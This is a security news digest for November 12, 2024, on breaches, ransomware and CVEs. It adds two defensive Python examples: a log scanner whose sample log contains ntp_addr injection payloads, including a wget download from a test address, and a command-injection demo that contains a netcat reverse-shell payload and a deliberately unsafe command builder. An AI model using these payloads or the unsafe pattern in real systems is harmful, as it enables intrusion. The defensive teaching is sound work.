CISO Daily Update - November 12, 2024
NEW DEVELOPMENTS
Massive Data Breach: American Debt Relief Service Exposes 1.5 Million
Source: Cybernews
A data breach at debt relief services provider Set Forth, Inc. exposed the personal information of 1.5 million people, including Social Security numbers, addresses, and dates of birth. The breach affected Set Forth's direct customers as well as those of business partners such as Centrex, Inc. It was discovered in May 2024, and Set Forth disclosed details to the Maine Attorney General on November 8. The company says it has implemented enhanced security protocols, including endpoint monitoring and a forced global password reset, is offering impacted individuals 12 months of identity theft protection, and advises them to remain vigilant. At least two law firms are investigating potential class action suits on behalf of affected individuals.
Law Firm Data Breach Impacts 300,000 Presbyterian Healthcare Patients
Source: Security Week
A data breach at law firm Thompson Coburn compromised the personal information of over 300,000 patients of Presbyterian Healthcare Services. Discovered on May 29, 2024, the breach involved unauthorized access to files containing sensitive data, including names, Social Security numbers, dates of birth, medical record numbers, patient account numbers, prescription or treatment details, medical provider information, clinical data, and health insurance information. Thompson Coburn has notified affected individuals and is offering free credit monitoring and identity theft protection services. The firm has not disclosed details about the attack, and no known ransomware group has claimed responsibility.
City of Sheboygan Hit by Cyberattack – Here’s the Latest on the Ransom Threat
Source: The Cyber Express
The City of Sheboygan, Wisconsin, recently suffered a ransomware attack that disrupted municipal services and compromised sensitive data. The cybercriminals demanded a ransom to restore access to the encrypted files. In response, city officials collaborated with cybersecurity experts and law enforcement agencies to assess the breach's impact and implement recovery measures. The city has not disclosed whether it intends to pay the ransom. Residents are advised to monitor official communications for updates and remain vigilant against potential scams exploiting the situation.
Halliburton Reports $35 Million Loss After Ransomware Attack
Source: Bleeping Computer
In August 2024, Halliburton, a leading provider of products and services to the energy industry, suffered a ransomware attack attributed to the RansomHub group. The breach forced the company to shut down IT systems and disconnect customers, resulting in a $35 million loss. Despite the financial impact, Halliburton reported that the incident did not materially affect its financial performance. The company implemented enhanced cybersecurity measures to prevent future attacks.
Amazon Discloses Employee Data Breach After May 2023 MOVEit Attacks
Source: Security Affairs
Amazon recently confirmed a data breach affecting employee information that traces back to the May 2023 MOVEit Transfer attacks. The data was stolen from a third-party vendor, and a dataset of roughly 2.8 million records was allegedly leaked by the threat actor Nam3L3ss on BreachForums. The compromised data includes names, contact details, building locations, and email addresses; Social Security numbers and financial information were not affected. Amazon stated that its own systems were not compromised and that only work contact information was exposed. While the MOVEit exploitation campaign is associated with the CL0P ransomware group, researchers are uncertain whether CL0P or another actor is behind this leak.
SproutBeat Database Leak Exposes 16,323 User Records
Source: Cyber Press
The educational platform SproutBeat experienced a data breach that exposed the personal information of 16,323 users. The compromised data includes user IDs, names, and email addresses. A threat actor known as "888" has claimed responsibility for leaking this information on a dark web forum. Users are advised to change their passwords, enable two-factor authentication, and remain vigilant against potential phishing attacks.
Threat Actor Allegedly Claims Leak of 489 Million Lines of Instagram Data
Source: Cyber Press
A threat actor claims to possess and is selling a dataset containing 489 million lines of Instagram user information. The alleged data includes usernames, email addresses, follower counts, and other personal details–reportedly obtained through data scraping techniques. Instagram users are advised to enhance their account security by updating passwords and enabling two-factor authentication.
Notorious 888 Allegedly Claims Leak of Appleton Harley-Davidson Data
Source: Cyber Press
The cybercriminal group "888" has reportedly leaked sensitive data from Appleton Harley-Davidson, compromising the personal information of nearly 20,000 customers including names and email addresses. The breach was first reported on November 10, 2024. Appleton Harley-Davidson has not released an official statement or confirmed an ongoing investigation.
FBI Issues Warning as Crooks Ramp Up Emergency Data Request Scams
Source: The Register
The FBI warned of a surge in fraudulent emergency data requests (EDRs) targeting U.S. businesses and law enforcement agencies. Cybercriminals exploit compromised government email accounts to send fake EDRs, tricking organizations into disclosing sensitive personal information without proper verification. This tactic has gained popularity, with underground forums offering tutorials on executing such scams for as little as $100. The FBI advises organizations to strengthen relationships with local FBI field offices and review incident response plans to mitigate these threats.
VULNERABILITIES TO WATCH
CISA Warns of Critical Vulnerabilities in Industrial Control Systems Affecting Key Infrastructure Sectors
Source: The Cyber Express
The Cybersecurity and Infrastructure Security Agency (CISA) added two critical vulnerabilities, CVE-2024-8957 and CVE-2024-8956, to its Known Exploited Vulnerabilities Catalog. These vulnerabilities affect PTZOptics PT30X-SDI/NDI cameras running firmware versions earlier than 6.3.40. CVE-2024-8957 is an OS command injection flaw that allows a remote, authenticated attacker to execute commands as root by injecting a crafted payload into the ntp_addr parameter of the /cgi-bin/param.cgi script. CVE-2024-8956 is an insufficient-authentication issue in the same CGI interface that exposes sensitive camera functions to unauthenticated requests; chained together, the two give an unauthenticated attacker root on the device. CISA urges users to update to firmware version 6.3.40 or discontinue use of the product if updates are unavailable, and has set a remediation deadline of November 25, 2024 for federal agencies.
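Because the injection point is a single named parameter of a single CGI script, exploitation attempts leave a recognizable trace in the camera's (or a fronting reverse proxy's) HTTP access log. The following is an added example, not code from the advisory or from PTZOptics, of a hunt query over such logs: it isolates requests to /cgi-bin/param.cgi, decodes the ntp_addr value (twice, to catch double-encoding), and flags anything that contains shell metacharacters or does not look like a hostname or IP literal. The log line layout is the common Apache/nginx format, and the sample log lines, IP addresses and payloads are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Characters that let a value break out of a shell command line; none of them belong in
# an NTP server address.
SHELL_META = re.compile(r"[;&|`$(){}<>\n\r\\'\"]")
# What a legitimate ntp_addr should look like: hostname, IPv4 literal or bracketed IPv6.
VALID_HOST = re.compile(r"^[A-Za-z0-9.\-:\[\]]{1,253}$")

# Common/combined access-log prefix: client, identity, user, [timestamp], "request", status, size.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def suspicious_ntp_values(target: str) -> list[str]:
    """Return the ntp_addr values in one request target that look like injection attempts.

    Only /cgi-bin/param.cgi is inspected, since that is the script named in the advisory.
    Empty or otherwise malformed values are flagged as well as ones with shell metacharacters.
    """
    parts = urlsplit(target)
    if not parts.path.endswith("/cgi-bin/param.cgi"):
        return []
    query = parse_qs(parts.query, keep_blank_values=True)  # first layer of %-decoding
    hits = []
    for raw in query.get("ntp_addr", []):
        value = unquote(raw)  # second decode catches double-encoding: %2524 -> %24 -> $
        if SHELL_META.search(value) or not VALID_HOST.fullmatch(value):
            hits.append(value)
    return hits


def scan_access_log(text: str) -> list[dict]:
    """Scan access-log lines and return one finding per suspicious ntp_addr value."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        for value in suspicious_ntp_values(m["target"]):
            findings.append(
                {"src": m["src"], "ts": m["ts"], "status": int(m["status"]), "ntp_addr": value}
            )
    return findings


# Constructed sample log: a benign config read, a benign NTP change from an internal host,
# then two injection attempts from an external address (one of them double-encoded).
SAMPLE_LOG = """\
10.0.0.5 - - [11/Nov/2024:09:14:02 +0000] "GET /cgi-bin/param.cgi?get_device_conf HTTP/1.1" 200 512
10.0.0.5 - - [11/Nov/2024:09:15:10 +0000] "GET /cgi-bin/param.cgi?ntp_addr=pool.ntp.org HTTP/1.1" 200 21
203.0.113.77 - - [11/Nov/2024:09:16:44 +0000] "GET /cgi-bin/param.cgi?ntp_addr=1.2.3.4%3Bwget%20http%3A%2F%2F203.0.113.77%2Fx%20-O%20%2Ftmp%2Fx HTTP/1.1" 200 21
203.0.113.77 - - [11/Nov/2024:09:16:45 +0000] "GET /cgi-bin/param.cgi?ntp_addr=%2524(id) HTTP/1.1" 200 21
"""

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} HTTP {f['status']} ntp_addr={f['ntp_addr']!r}")
```

Run against real logs, the HTTP status is worth keeping in the output: a 200 on a request carrying a payload means the camera accepted it, which is an incident, while a 401 on an unpatched device tells you whether the authentication bypass was also in play. A device that only ever receives ntp_addr changes from its management network should have an allowlist of source addresses applied on top of this check.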
Many Legacy D-Link NAS Devices Exposed to Remote Attacks via Critical Flaw
Source: Security Week
D-Link issued a warning regarding a critical command injection vulnerability, CVE-2024-10914, that affects multiple discontinued network-attached storage (NAS) models. The flaw allows unauthenticated attackers to execute arbitrary shell commands by exploiting improper input sanitization in the account management function. Affected models include the DNS-320, DNS-320LW, DNS-325, and DNS-340L. These devices have reached end-of-life status and will not receive security updates, so there is no patch to apply. D-Link advises users to retire the affected products and upgrade to supported models; until then, such devices should at minimum not be reachable from the internet.
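The D-Link bug is the classic shape of an OS command injection: a value taken from an HTTP request is spliced into a command line that is handed to a shell. The following added example (illustrative code, not D-Link's firmware, which is a C CGI binary) shows that shape in Python and why it is dangerous, then the hardened form. The unsafe function only builds the command string and returns it rather than executing it, so the example can safely show how a shell would tokenize the injected value into a second command; the hardened version validates the username against an allowlist and passes an argv list so no shell ever parses it. The `adduser -D` command, the username rules and the payload are assumptions for the example.

```python
import re
import shlex
import subprocess

# POSIX-style login names: must start with a letter or underscore, which also rules out
# values beginning with '-' that could be read as options.
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")


def build_adduser_command_unsafe(name: str) -> str:
    """Vulnerable pattern: interpolate untrusted input straight into a shell command line.

    Deliberately returns the string instead of running it so the payload can be inspected.
    """
    return f"adduser -D {name}"


def shell_commands(cmd: str) -> list[list[str]]:
    """Tokenize a command line the way a POSIX shell would and split it into separate
    simple commands at ; & && | ||. Used to show what the injected input turns into."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands, current = [], []
    for tok in lexer:
        if tok in (";", "&", "&&", "|", "||"):
            if current:
                commands.append(current)
                current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def adduser_argv(name: str) -> list[str]:
    """Hardened pattern: allowlist-validate the value, then build an argv list.

    With an argv list the username is exactly one argument to adduser; there is no shell
    in the path to reinterpret metacharacters, and the regex blocks option-looking names.
    """
    if not USERNAME_RE.fullmatch(name):
        raise ValueError(f"invalid username: {name!r}")
    return ["adduser", "-D", name]


def add_user(name: str, dry_run: bool = True) -> list[str]:
    """Create the account; dry_run=True just returns the argv that would be executed."""
    argv = adduser_argv(name)
    if not dry_run:
        subprocess.run(argv, check=True)  # shell=False is the default: argv is passed as-is
    return argv


if __name__ == "__main__":
    # Constructed payload: a username field carrying a reverse shell after a separator.
    payload = "alice; nc 203.0.113.9 4444 -e /bin/sh"
    unsafe = build_adduser_command_unsafe(payload)
    print("shell would run:", shell_commands(unsafe))  # two commands, the second the attacker's
    try:
        add_user(payload)
    except ValueError as exc:
        print("hardened version rejected it:", exc)
    print("hardened argv for a valid name:", add_user("alice"))
```

The fix is the combination, not either half alone: an argv list without validation still lets a value such as `-h` be interpreted as an option by the called program, and validation without an argv list still depends on the regex never letting a metacharacter through. On an embedded CGI binary the equivalent is `execve()` with a fixed argv, or an `fork`/`exec` helper, in place of `system()` or `popen()`.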
Security Flaws in Popular ML Toolkits Enable Server Hijacks, Privilege Escalation
Source: The Hacker News
Researchers at JFrog, a software supply chain security firm, uncovered nearly two dozen security vulnerabilities in 15 widely used open-source machine learning (ML) projects, including Weave, ZenML, Deep Lake, Vanna AI, and Mage AI. The flaws allow attackers to hijack servers, escalate privileges, and compromise ML pipelines. Key vulnerabilities include CVE-2024-7340, a directory traversal flaw in Weave that permits unauthorized file access; an access control weakness in ZenML that enables privilege escalation; and CVE-2024-6507, a command injection issue in Deep Lake that allows execution of system commands.
Epson Devices Vulnerability Let Attackers Create Rogue Admin Accounts
Source: Cyber Security News
A critical vulnerability (CVE-2024-47295) has been found in various Epson devices, including printers, scanners, and network interface products. Where the administrator password of the Web Config interface has been left blank, an attacker with network access to the device can set an administrator password of their own and thereby gain full administrative control of the device. Epson urges users to set a strong administrator password on every device, restrict network access with firewalls, and keep firmware up to date.
SPECIAL REPORTS
How Human Ingenuity Continues to Outpace Automated Security Tools
Source: Help Net Security
A recent HackerOne report reveals that 10% of security researchers now specialize in AI technology, with 48% of security leaders identifying AI as a significant risk to their organizations. The report highlights a 171% increase in AI assets on the HackerOne platform, noting that 55% of reported AI vulnerabilities pertain to safety issues. Despite the rise in AI-related vulnerabilities, bounties for these reports average $401 compared to $689 for traditional security programs. The report emphasizes integrating human expertise with technology to effectively address the unique challenges posed by AI and emerging technologies.